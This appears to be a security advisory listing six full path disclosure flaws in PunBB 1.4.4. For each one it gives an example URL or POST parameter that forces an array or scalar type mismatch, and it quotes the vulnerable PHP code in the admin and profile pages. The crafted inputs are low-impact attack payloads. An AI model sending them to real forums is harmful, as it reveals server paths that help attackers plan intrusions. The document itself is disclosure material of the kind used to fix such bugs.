Topic: Full Path Disclosure (Multi)
PunBB Version: 1.4.4
PHP Version: 5.6
Server: Apache
1)
Example: protocol:localhost/admin/users.php?find_user=1&form=1&form=1&form
Need Admin Account: true
Vuln Code:
else if (isset($_GET['find_user']))
{
$form = isset($_GET['form']) ? $_GET['form'] : array();
// trim() all elements in $form
$form = array_map('forum_trim', $form); //if $form variable is not array
$conditions = $query_str = array();2)
Example:protocol:localhost/admin/ranks.php?action=foo
POST Data:
[other params]&update=Update
Need Admin Account: true
Vuln Code:
// Update a rank
else if (isset($_POST['update']))
{
$id = intval(key($_POST['update'])); //key is don't work if $_POST['update'] not array
$rank = forum_trim($_POST['rank'][$id]);
$min_posts = intval($_POST['min_posts'][$id]);3)
Example:protocol:localhost/admin/bans.php?sort_by=1
POST Data:
[other params]&ban_ip[]=127.0.0.1
Need Admin Account: true
Vuln Code:
else if (isset($_POST['add_edit_ban']))
{
$ban_user = forum_trim($_POST['ban_user']);
$ban_ip = forum_trim($_POST['ban_ip']);
$ban_email = strtolower(forum_trim($_POST['ban_email']));
$ban_message = forum_trim($_POST['ban_message']);
$ban_expire = forum_trim($_POST['ban_expire']);4)
Example: protocol:localhost/admin/censoring.php?action=foo
POST Data:
[other params]&update=Update
Need Admin Account: true
Vuln Code 1:
else if (isset($_POST['update']))
{
$id = intval(key($_POST['update']));
$search_for = forum_trim($_POST['search_for'][$id]);
$replace_with = forum_trim($_POST['replace_with'][$id]);Vuln Code 2:
// Remove a censor word
else if (isset($_POST['remove']))
{
$id = intval(key($_POST['remove']));5)
Example: protocol:localhost/admin/settings.php
POST Data:
[other params]&form=1
Need Admin Account: true
Vuln Code:
if (isset($_POST['form_sent']))
{
$form = array_map('trim', $_POST['form']);6)
Example:protocol:localhost/profile.php?section=identity&id=3
POST DATA:
[other data]&form[facebook][]=1
Other Vuln Params:
form[url ]
form[twitter]
form[msn]
form[linkedin]
form[icq]
Need Admin Account: false
